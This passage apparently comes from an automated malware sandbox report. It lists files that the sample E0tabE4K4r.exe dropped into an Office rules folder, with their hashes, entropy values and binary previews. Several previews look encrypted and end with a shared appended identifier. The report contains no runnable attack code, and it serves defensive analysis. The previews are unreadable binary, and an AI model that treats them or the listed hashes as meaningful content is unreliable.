                                                                                                                                                  Preview:<?xmlkW.F..n=.... ..[(...,RC^....<.L..|....,...{.g..........V..is$.....dPg.w.i...2.>P.L....\.V....f.d.....3..J..j.d......._.G~B..E...?......(.........D.(.+.c.g.Y.9.. V.3..Tl...Q.T...d. .C..Qz.lSm|t.5g ....N.<..|....s.~N.d]...].#.H...yC5...%......a..l"..Ru.......jR!......G4.s.o..>.!....1...E.y.n.....x....K...J..{..sJ_.N...*...Z...pf.x...QbeaT...C..t..T... ....h...b.[......R.V.;).m.........>.....V%...k.......Q8E...o'.c...<Dz.D(|..Hk.^...{..:.....s....%...D....Uq@. ......(......w.sV.-.....G.@......rWZY.Yf.z.V..}.....g..H......w....].nl.gh0 i].<..........D.....V[.....8Q...B...#!\...b...>.;.9;..H~.)Z}.g... ......ET...qnl.I\.N.A.T..c..*1Q...X....L...x........G/..>..U*.......8.A.a.l=3.S|.:+.:1[=Yh...o...s.G.Y.............].....!8.S)(.....qVjCX..w.u.....E.B..b...?.;..+;98.._.E.y......./.J.........%.K:8..\.../P.8i...<.mJq.+U.]...K.W.(...Qp.[..lS..Z.1..J3...'..!..Wv...{...E.tz......7S5...I;x..QN.-.+........9.p.s4'........?zK...(...F..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510005v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1269
                                                                                                                                                  Entropy (8bit):7.82567700684484
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:y8WIs/yMiaWXyOAgzVz2NeGOWPnUC0S41dFal35Ia8pZJMDy4j1mT2bD:vWImCaWXrAQVyNeoPnUK47U8DJMxD
                                                                                                                                                  MD5:F520B96121BC64448DCDA1908AE5D163
                                                                                                                                                  SHA1:2A1731101D026BEA123BF303656EC4270C6440EE
                                                                                                                                                  SHA-256:B182DDDB1B8B38C1B46B904A84C53C7A6973EAE91FC1B90069768AB05DC06C52
                                                                                                                                                  SHA-512:636F817CD399F64F3A9F4BCBB3E1E0B0FDCA06D79EE20D8D538C505473A1E77331C0399896E449F152C8CA6ABAFEF02236C7D196A7D9D83C319FC0049BDBB8E5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.S%..I..fP.N8.E......Kx2.....T...z..D.c.....um..2\....p.K...@.....JO..}.>.~...p......^..H.,/..Q.>.|..[..:..}.N.8q.tY#..n.6W....i..Y@...71?_.JH(.4z.. "J..->b..r.pA.~.i..qSJ..7.....5.]..t.:.|?.v=y...)7~[3.6hN....:Z.|} ._...~q..z......}8..`./.X...s.;L....!}v...V.p.?f......46.|~>.....5n.;.R..8..m..*..f.]...y.x.$P.....L..?n4.[X......[...Nr...;s..+.V.....n.Ah.!...\.^.....i.B....v....re...3i@.P.N...k>b.o..-A6.6.4@9..l!.....P.B.P|N. v#F.Z...N....1..=.1...'u~X..b`.s.5.-u.a.{..]ob.;.jaK2#'.`..5._..HD...^ ..>q....[$F...{..l......X../..p(.}J..........N...rA(A.;.........91.r..X..w?..7H..8c..>......#..)...aJ.....a.{..x...*i..@.Q..W....d...H2h.4M>%...E.I.6.W5.].?....+. ?IM...l...F...9....74{eF.b.O.H~R.1.^~.....i..^D..1<.N..l<!..o........h.J`l.].o.W..j.p.f/..|H...YT../.D......'..iU[r....T.=...@.nR.F.}..V.C..1D..[NG.#....DL[.T...<A#.R.^......Z.D_1v.e...lMJ:S..bc.2_..._.t.|D.N...8......t.....I..PP.\.....j..V^h.d.5..j@.:.... ...(.....W9..8rX.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510006v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1088
                                                                                                                                                  Entropy (8bit):7.819512767291182
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:q/8WELWd/vbt70JXy5sJJHSyb7JCM5peptyomj2bD:q/vEWd/vbtYViAHSyblVfevXTD
                                                                                                                                                  MD5:3F95CBEF9A3AF5151A386425E2604D3A
                                                                                                                                                  SHA1:4A56F5C3185A2CF38E56F24EABD788332C1ABB8F
                                                                                                                                                  SHA-256:C2B21CDF291F668C139AEDE1F58E3896B3076D077BCD747B7416A00A896A7341
                                                                                                                                                  SHA-512:3476FAC928F220889E2D024B2527CD9F523E9E1EE1560CC8C243A6359767B278F1743C13316499082C3CD7BA9AE683E968FDE7308AD4A9A484B6CFDA43166C5F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml2!.....~Re.#..3T]....PX.f..>.J....AK.3..... .lp#H.N.~-.......>...F..x...M.,K..5,P..(B6..o.v..g....I\-..b(.Z{M......VS...U....BI-{ .N.B6..V.].#.ci.......+0..'.,.L...X...t....T..)V...B.E..7M0.K..|.7 . ...d..r.....$...U..8...r.v....X........%'.@.R.%vg..^........x.5..y..B.....F..v...$.S.M....A...UGo...W..J..<.d....W.0i.vl..;.. ...9..c....k.YU..y.+C...ZD.@.'P+...,..........^..6.P%QZ..,m.4...@.C.......x..C..3.nw.%..J."..&.Rb?Z../..Eo.}i1.a>...GB....>h.P.F..<[RU..u.6..q.%.......a......'nS......3.%.m.\..Fh..a...,.@.g*W...J+.t[...G9...OE~.g.W..C..."..J.Z........~l.P....h...VJ.?.\/..k......8I....k..3.+...xT......A|...i.5....z...../..Dq..|..y.[.Y8..{T.=n...(.n_....m.(.{.`.K.m4C.....G..&0..n......m....H....Xb.V.:.y$.....b$J#.K.la..V_.U/.;.@.>.y..EV3..v...9......F..R...[.t;..7d_..C.....'.. ..j...S[..12psoR.:.e7.kx.!...u.....W.......t....{....3(...~.[.tb..p&Q...x..+5..-Dz.....#.`.\.Y.>hM.M4.$j.P....*.9o.X...g.Z,..SW..F...._...}.._.&..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510008v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1100
                                                                                                                                                  Entropy (8bit):7.811733636822648
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:bLulfwZiOE2RYPenwmakuats86Z+FmG82aJM5CvHoUA9bOXB2bD:fa4FOfCs86o78xJPDqbOXaD
                                                                                                                                                  MD5:87925CF0E46D47E15A973C1021BEBABF
                                                                                                                                                  SHA1:9DF130270522A774AB462608554C136F2BF3F88A
                                                                                                                                                  SHA-256:EF451F55B5FFB6DF925820F5BE13FE80B7836D8FE61ED3CEEF07F92079965E99
                                                                                                                                                  SHA-512:DD6FFA05CA48B49FFA7F9A5A8C8F3C50F04DD124D0C5E474C5C16F1F9DA571AF5E5835AE4E774B5A7B6D8491B99BCA7E5DD62D461271BE8DF219994CF5DB8303
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml!....E..c.r..9..G..z..w...h.....j.f...0...;....Q.....h..^....6..s..m]D..3.:&\.R.4..bz.D.....17....2..Hq.h/n.....}4..._.%.B.Q......Z..K(.....<".Z.3.rA..FZ...Iu....Y36L .h.r/.k.F.)/.K.8>....] .`......`=.9...f.k`.........:?..D6d.'.h..... ...@...........M)kw..m.<9....!....y..Dh.J...K..z......j.D.?..+2.F..DvI=./.....%.......)V.3..tgEqIk..^.{k...$...I|..`...Dlz..J,;.7C..&.N.>...n...!#..U...;-..JO.T......N..<A.nHD...o.`...Z|@<.wX.....5`...$s.5..M.VU.T...;...cf3..]t.....F..B...._....#.~m..|-\..)...>yo......s..hs,...R.w.1..`.<..V..Q.}...:_...f........\.jAMokT{..S...Y/$L.....9.}._...eEb...\..Q.(.;....._.F.....1-3g...D..q.h:..j+ ..nq~...$.W.....4.V1>.Q!...{.1wLvHj......9.b.1.`.j~H...-..|.L>f..X>....%@...W|....,Os"i..2...#.U.SV.F.wla.x\..N;....@i....+*..A~..m..U.`hX.......Q...,W9...../...A.......~........1.Z.6..<.s.Jr.......1...x..l.dW.A..J'..`.....U..,..{.g.....;....1B..p^..........@...V4...\`$..H}.3..x.y...}K.)[#?n.......>...w ..\.w..."...S$vQl.7...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510009v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1192
                                                                                                                                                  Entropy (8bit):7.834588755347408
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:31akKTP8+BG69PU4y4/8my8kTAEtqQMDi/CYX2bD:3kfBG6ppkaZSPMDgClD
                                                                                                                                                  MD5:9003CC0A1CFD767CCBEFBB3F11F72795
                                                                                                                                                  SHA1:5693AC01786A9C6CCF893DC39CF972EC5CD61B7D
                                                                                                                                                  SHA-256:FBC669FA2C24893987757BE83656473E0590C05C3E32C5B51AB32D451FD12042
                                                                                                                                                  SHA-512:36B3918BCEBCD65696095C5E5841EA386A1FD09BA27C3688BBF6EA716E94A6605FB3A114F7904E4F0F47DF3D76BE65A7B021BB9CE913BEAFFAC48ADCC1977920
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml........dA.mH.[.L..x;CE...IP..R.Pq_........V...V...7S.?..B&.s...2G.V.r...-....WIE..m..b.....z.......).S/.........y.....52.5.<...`Z....4.....YA.r.\.....|.2..A.0...6.....4............F.eL.>N....N..FF...{]..d./...Q...b.^.X..x.r.\"$#.*i.ek.....?.{/.oD...J..%.....;L..p.....(..:..p..$.y.q}7?V..:..".6k.K$......~.S.?....6.[F..@_T..<......s..=..,....N.{..V.a..x.@..R."......k......'/:Y..h.i|H..s=~.........`....cH....U.s......j82A.l.w..Sa.o....E..'I....{...+p.QB.w:U...r..}:WR......n.b.v..pK..M%...7.P.I...}..1.FRP..;...f.j.=.s.....$.......fxd.....!.5.>w?=A.....<.5.z...C......m1s.,..U%......F....(\...vN...\!......0..W_...Wg......>IC..]....|.,n.S....p.. .G4..+H..Wz.=.m... ..Z....`..`+.*.0....t...z.LG.q..[........s.."..F.W.r..oI!...I^.U.*....`F....8-....Z...DP.aW.)}M..Qg.........O...j.......?8..1.0...B..}...^Nm.".>yV....N.%N..EC3F..J..Ep.=..>..$....R.k.+..~.......PM.........p.W.-z.5.( .n...M....I.r.3...`.I.?.SI..r.[.tV.L.H......'...5.^

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510010v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1031
                                                                                                                                                  Entropy (8bit):7.811832573484553
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:qBWT/ZfoDV9hOHZ8v0+oxJeQdfQnjZ7xTrxqqkVGN2bD:RT/I9G8v0+oLtdfQ979sqkDD
                                                                                                                                                  MD5:C16759D61E2FD414CDA1D31D5FEC9136
                                                                                                                                                  SHA1:F6FBEA1B35775ACA8EDCD33265A16B8965BE637F
                                                                                                                                                  SHA-256:7D943BFF8DFFF5FB0E80274CD1234982214E4E0B050211DA3755F13A2898A0C7
                                                                                                                                                  SHA-512:DDE9E59112585512DA83F63383E021FDD6EC1B686390403BE7239A9BFB33A567346A616987659B6A1634E66B953CEDB642B5DD3F6A1388B374D77A65875A0558
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.......,.V......w@..).%$.D..R.L.".b[.....V.F.l..`.)A/...CP...__...N..(+^..G.o~.....x.k..J..-.H..G... !"i.PnsN7...e?...t..PJ...W._#.J2.0.......@..L..s}...(Q...E.K.f%..9.3..U....5.7r_.}F..M.f.Ki..W..w...{...Zx..."...B..9%...3..h......G..T.h..b.5h.......c.D...&..[..I.+dD..'.......4f....R......Mi...G.?...6.i.."6.T\...........O..i.C..{..p2;.....w7..Z...P".g..f..w..)x..G..._aR@....K..4.[.v..`.t..M..K.".{`.&>@I.%...u...y.I.?.l....Mv ..R...:..9$.M....M.......^"....$.....!.z.$mp..s.N..D........L...]q..?>.5.k..R,|...`d.t......}.E@...]..%...../.e7i....ry..W.hM5G@......y.....$G....r....\n....{.q..#we.:.|..B.....o.A!.6.F<....x/......g...@..q_.(v!....!..w}G...I.|].r....?.v.......E..I.[..~~..........B$...H.V(Te..}.U2r.......^|.>.q.D<b.....(.s.<..Z[..../."YZ..W....B..u|...Zq..Z..j..n..........,.z.M)..%w:......__".r'y.[....W........j.w..d...VU.D.M.............ne.f|.w....m.&.r..K]nT...e...2-.#.?W.V...en...V.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510012v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3884
                                                                                                                                                  Entropy (8bit):7.950550234003554
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:3ixbBpi2SJgfcLY/sIvZmXmpIjOUoy0VUc0pPchNsq:aK2SJgEXrVjOOJcZXsq
                                                                                                                                                  MD5:779F246D9606B6BB1838C344522448C7
                                                                                                                                                  SHA1:A14998753744C596E1BD08ECBF2CA685BDC80B17
                                                                                                                                                  SHA-256:F9E9B82A24A1579577368A14F5657836CB428D2957FD7227BA1B575DCBF4F85F
                                                                                                                                                  SHA-512:31A41FE34D534F5D4C62EC834218CF5EA34C31AD5B9884D94E1D17C373C5725A7BC1565DB205FFF0C6EE779F0C32E62D1C20E483C97C1116202DB71849BE0044
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.....Y.XN{s+..f.J#..,....Q\U.v..<W..2........>j.zR.u.j|_.w.5...E~D...\>aY.^y......:...X...]x..............6...@.T.O{u?..].._.b.z..1..:s..F....8bv...<.~.xa..;.....{.9>L.k.s..KB.....ii......,s.<5?..&.}^.FD.X1..'...V.Tt..'.9...j.>..'w.....f..?Q8.....2H...D4.....R..:#........}q..................d..Q.........d.,Q ]T...U.....Tj)..L.c.~O._0..fw*... %..5}[Fs...*..L.v..I.Y.S.o$m.... .s..B.P........(ak..T.+..+X.|.....KmW....8cP.L..uIm...`..s...A..r.%.g..=.;........X....6.k.R&>'..A...K.c!...|8.s_..A.0[.a........i...r.L......4..l..{R!.n....m._C?.|i..%-..31_.x..)ytcZ...x.:.I'Y5m.......&.:Wb....,c...P..{.Y.'^^N.......$.@.Z.'p7..J.ua#...ckA..o..i..R(..VR.T.#..'..@.h.....F.m$W....S.C.........F.....s...ah.~....C/...?N;...m4...n...,k..N.+.Q ..7.....7.".G...ZJP.&..,.|...C5....#}.)..U6.O@...,B.MF.6.x.;.g..%..)..rI.U......r..Fp......I.....i..ifK....U*%\...X,...F..*..IP.6../.z.Mp..i2P.1.ht. ..[.,.Hf..M..Prt.o....F..........-..^~...@u..F.(....wdq.7

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510015v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):790
                                                                                                                                                  Entropy (8bit):7.73102698079766
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:XcJDKRV3y0PxkXwUzx+5CWzTphJ9ObW5Eq+2bD:XcNQXPUz+H6i1lD
                                                                                                                                                  MD5:C94595A9116BC640A26BDF052FF7F133
                                                                                                                                                  SHA1:72A8E9385BB7A3FB2C0D1889C6DC42448B77DC3F
                                                                                                                                                  SHA-256:26C56DC5F968F57DBD53CDDBCB9F071BBA4DDFEB6CA7C14A1B3F9C42F1374F8E
                                                                                                                                                  SHA-512:8431567A6575A42F8FB27B04F9136ADAEB64D2834CD652A233D8504F981F7184D6CCEF3D7929F2B1F565E2758048900E1F2766739FCC73BB0DBF01EAF94B55BF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlB].i....mt.._.G..&.'....H.1...B7.....A4'.)4I0.U..........\qp\. .R.k...{.2.!.Ki....x.,y.._e....H.S ...s.`..(..Y2.L..:..i.........W.U;g...-..{e^z...#.&.DOg.-...8s..}.8Y.uK..".F..7l........U.N......>..7k.|.....).e..O}|R.f!.j....p](..s.......k.5F.i.p).D?.r.$.Mv..G.........@..k0..%.x|r.,..K..9(..[m...h...q...J7.%.....5.>.d..+V/...d.9.. ...o%...BD....K..I.!.R.NY..~.7....x.Z....Sp..4P.._..fq_J.... .h....?E..H.....k..T... .h..\,]..q.h..RL..M....N..N..O...._..}I.Mh.".../..'a,......x..{..N......%K.TN............Z..J......Fy..s..L.]\;..f......=e.*lC3.......X.3./.*.w.]1v.M..|(V,-.vj.:)-...!%c.\@/m.)y..D.......'../Rb..w...T!....g]....m.i.\..W.....g....p...Vh.r.a.&..lZ...c.?[....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510016v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):3934
                                                                                                                                                  Entropy (8bit):7.958070526626948
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:wYtJxKGOXQ78Ny15Zf8Ngj7S1cXbrI6ebKElcSu054tkW0D1TM4sg:3jR7ey15Zf8Ngj7S1QIzmEsM4SdRwpg
                                                                                                                                                  MD5:8DBCB778D542BBBCA9D86FDDE6F25DBE
                                                                                                                                                  SHA1:DFA5CC2C2EC352DE124104EFBBFD5203431FE231
                                                                                                                                                  SHA-256:334AB8637E1BBE91821CCE74E43B45AA9AD3FFAB23D4A49E8842C83FABD573FC
                                                                                                                                                  SHA-512:5A634535DDA70F9D7CA572124306CE00EBBD87403208B055A4A45921DE7535BEF3A938EC2C310BBBBAA41B3EF358A2FA048E6CC2F4C019A797387A39AA48766B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.m.....`z~v6..h.L...Z...\.G^...md.*xu.4....E.i..N.....G...?]R..>....-H..;$.E.Ls...vw.. ...,pkU.86u..3<ta3v..%...O..^..d.....l..T.>....j.d.4.0..sF.....5.#"hA..gZj.g..']..C.k.g......`/..;.`.&..G...Tz-o.(.........%...u0..=..5.....gU..*m..q..D?..f.....m..QO.B...O...!..r...8-^Qu/....[....-.[5e.XXb..RM..t.I...{.y.=..bx..+.~....ES.F.........4..kyGVq2a....owC0.....j.:=4.|V"&........V.s.....9...{ ...:..Q..A...n.]..U..F;"...N].L...h.....@.I.....K..@.....u.Y.)..=f.W...%..%.Zk.. .rJ..}.@.A..c......F..*...z..|..<...lw..w...."[....Wx...zU....d."....;.y.#. [)4g.p-..*..C...r.?%.....8.L.y......z.!.u'3.1.]..z`hU...&i$.. ..y...B..\.](q...%..$.{..cS.y=...i.#..e...3..rD...=.c...j<.2\.H....?.P..f...f^.Z...4..5X.g:..g.U...[.(?&...-l9..Ze...U.~Y.j"..C)....S..@..E.....WX.4|.&..\.....M...!..s.~.}....(.&B.w.....K..Nc....!>..R}...Y...(..w<....L+8...W....U....j.OA.E..-.m.}.....w..J...!9U..s..~...>]C..2.X..n.E.'g.._._-..A..^6ZFB..2Ni./.L."...>i.H..._....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510017v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1148
                                                                                                                                                  Entropy (8bit):7.839296079070981
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:fNCKnk6PFxKMnxeyJFLoLiHcpLBtoNY8kulT2bD:fNCYksyMnJFLWrpoNY1D
                                                                                                                                                  MD5:27315F1CBCE4C1E529C99100CABDBD60
                                                                                                                                                  SHA1:3C4EA75F6B0BCCAD926C2CEDB35E7C0611A12C43
                                                                                                                                                  SHA-256:6E5DF02E99A198D4FD7817956197D58453257A5131E7BC8D577AB1CBCB8EADB4
                                                                                                                                                  SHA-512:8B74825CFF64DB8D22CD0D1E44C1F5CFC5069C4598FC61DEEFFAC513A4C363CB179D236412CAF7838A807712B37EE7F77A8086783770EC8960F556AAE60B50B2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.o.. .4hO.3...k.Lr..f.RoD..L.c...b.!d.0.!@Fpm"..E.....;7f.....0.p/m.<...X.U..7S)./(.#...d........pL..f..L.%|.Loz\M..%.&>...M...`......>... .q....r.=..P...<.'sy.n.eAQ.L.(.".'..D........Z.....e.U..........:.W>..d......k?G....6.^.....\O.a......hv...X.J+.1....m.c.?`.k.<.6#.......j..,]]...Kr....r..@8\....s.4.d...|......lr..hm4..H......c mB@....%......lN.hj....>6.!1...m..:E.nvW*J.b.......j...e=...g.6.D.{....n;u..~.[..z.kg<..E.[c.f..F..(.fJ...o.........q....m.S..E.A.*<Q+d..2.k]..@j!.A...Ep.b@.T!T-...V...w....b.L..U....f.n......R....}..To0;N>KD.~......S......O.......!0.S...|.y}.@...h....../0.G,.y.j.,..wO.... .....~3..s .&.f`....K._.8PB:...H..i..h.h....F.+j.......j.J.2....4rP..q%.p.c....?K=....I...3........<.>..XK.._Q`.}.tF.VR.f.6..........O.K.`.!*......P.Y7{.&..b26&...-.o.~o..._r.V@j..8..,.~.|..x.5..7.W...-`...6.(.2g..k.Y.....ru.E..[..#.6-.d...S..!.W..TyA.[.....D?..a. 8.?..... ..p..I...V...T#F..pj.R..?..dx....'&...i.K.G...<j.."-.S..&.?O.h.....5

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510018v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1782
                                                                                                                                                  Entropy (8bit):7.899579535313257
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:CDa5NJU5dZZmDQi/y41jm9BYMYCmEfkTmUhqD:CDa5s5ZmDQsyOCcbEfLb
                                                                                                                                                  MD5:59A5E81EC622006DF50DEA6A094B2612
                                                                                                                                                  SHA1:4C60216DB9B946AE22D68050E30D20150AED8B24
                                                                                                                                                  SHA-256:4FF5C848BE9373DAE3F6FA1D3000229ABD9604211384734FED2D375206BCC0B3
                                                                                                                                                  SHA-512:D1550769D30FC703550B89D2776B3001C90B208AF440C6879EC0EDBE601EA6C4C3975334BDEEFA7486EDE598831A6E013286B896A1B8D818778980E78E38B956
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...) ,.!.,O.6..,.,AXX...b.... ep5.d..&.....v...+..[...,e.=..H..I......eR..E.....?,...Y...E..*b..we.,...[.gP.EL'O...'Y.....+.Y..X0.#..n#...../..Z0i.ht.3......y5..\.Yz}.."[..9.b!.1-C..e...W..R..1..C....r..[|.n5..X4..P...:..~70.K.$..s....R]W..I....g+.L.}.F.J..R....$.Dk......z..I..'Z.;..h.0....v.l#9....%U.).F+D~......D.........D..m.@.....r'.;.=......)%.A.K...2...JXW1_...m..:......`Es37.C.B...M+..^......p.w..he......SP........H...h.w...__r.#...A....g>..."b.??.#..dm.I..J.\.@bT..a.b.X.^.LQg.:..{...."..r]..........L^3.=D.L.|.]...$~.IZ.4.%yz....h.P4P....<....*.z.......:....Eo.].A..a.\.m?....SB.!K..h...ge..x............zJt..]...}..+.>.....3..mP.T.....3qV......6Hji}=...#|O.G.!..k.u#........y..X.s..q.5.r.l&......\Y2x....Q..s.#.A..[...8.2.xK...f.!;.|0<.y.....W..b|.g.E.$+...<|.h.A.3.O..SS.....Q<F....Dg...N..N....jg..y...>n7.k...C9...e...b......Yi...ng..N.4..I.v.".j...">.o..)$z......*..^.0.X.|B.M..oo....*...Q...S2....rt.....+.......Fd............vf....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510046v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):791
                                                                                                                                                  Entropy (8bit):7.7378233998656105
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:/IUVpnATieXt4Qd3IIVk8GbJTgAVNi5To82bD:w+pnATik4AZnI1gGi16D
                                                                                                                                                  MD5:3F5BA707599E9F880E906C61FFA4BC5A
                                                                                                                                                  SHA1:C07CA5F66085C6CBAD32F4FA0476DAD2721281E6
                                                                                                                                                  SHA-256:E4A21CD0EEB22C17A9B42CBC6DE36274D995358871B6A40AD1BAE4279E819815
                                                                                                                                                  SHA-512:419F92765EC09E0F1285833773C3119328B1F7608EE59CFA5CA3B46A1E57D8424D1B24B4813C1E809CEB1D420F480D7B1D09EB228003E5DCFB638450E2CBBB37
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml|..h.\.$_.......V..Y..V...S...=..-Z(.F........hj.'.n..p..?N...~.._..`..#..-.P.....a%'...&6...#3..2P...@..2..3.0c...{...=.}.`.MQ.....I.2K.l..w{l!v.9..!.E......}O.iL.g.!...y}U^.~..QW..+....)...V.9.....=..XK.4....E.n....d-.Q.B.3.(.5...g..KZ?.6t.l.tuw.f.......a..}..+D.@L..l..{%.2S8...z.....>S..y@.a.)"dl..&.?..C.-K..)..nq.n..o..9i.0&...3.b.....A.V...:5y......:...u..o.|....;0o.q P.'..%.4.FA........ ..qI...Z..>c.j.!vr.R.p>...Y$.(Jg..."..v.......O+_..s.^....e.0.Y.VW".......Xi.c...V.@.....#Lj.=..........@.T!..v..]. =Ft...G... P..........Y...(...~xd..Y.....o.1.K.v.....]...o3=nl..>..$.s-_X...[..G.n...V....../...(...+..{..../.o..9..V...P:!...A0..L....T.P.JW...L...R2..:....*9&..X.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510047v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1082
                                                                                                                                                  Entropy (8bit):7.811511725064662
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:cSqbVXcBY9YwA4KVxlPattGQ7DH3M1PPJOb4BWgDD1mys2bD:cvbVXcCePxlPaGQfuXLzIy/D
                                                                                                                                                  MD5:576B9B028BF9AB546C65B45DC712CC66
                                                                                                                                                  SHA1:BA7C2CA95B1DB889B43F6DACC01E9FA5A18AE0C0
                                                                                                                                                  SHA-256:75DDF2BFF8F73835E10CBC52F14F4A483935D3810A8719C77ACB6E39FB799FDA
                                                                                                                                                  SHA-512:5DD0A7B83158ABBB719E6378A5681030B5A25A5681540F572913F5C5DF221D83E2D27677180F985A8BEDCE9279D7E3818753F0D2DF66CE808D1557D4DDB6CA25
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xmlN.a.E......j_J..z..W.,.y..w.........n" ..(..2...;...ib._.q.=.u...q)...k)..;....r:.. ..(.<l...1...W...z{....x..T.,8........(.KP......n.j/K.(../....h.,j...c.~:,.L...<..\........$.i...J6.?. .`..3...F...>}..yj..p.4...w.<..e.*.$C.c..$...+...Y#^..E....}............sg..C.....Nh..\.8.C........1E...M......k.j2r#..T..i".._....c...l$....*.J.UMW.....t30.``...|..........wG}.F..w.6v....c.o.&..4O;.C..u.)..[.`..**].0`(.[........a,o....F_3.l.............*.?.9$6-<....x{\..v..T8v..qW,^..|+f..2t.......s.Ud.>.i5wx.<....?....jw.N....M.<@.%d.....|......CA.B....!.mFX.P.~....C.....i.,KQ6!.$...r......&...[.1..r6...^E....pQ8..j....xH.LB[..[.....w.}"d..?;..#.v4..w..|X.eD........RTZ.w.....!>.r.....HBK.H#.;6.sEN..`f.)..K..5.;b......7..F.....2......Ba....k.t.1IcE...A....T.Y6x)......J..$o.{...G.~ l.D{....:f..M....!.A. ...Cb(4.V#/.}....v...........P...g........)....u.^b.&Y.E.[.L...(7...Y..`<... .q3....G..).....y)...zd.._.nz.O..[N..Y...^.o

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule510062v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1061
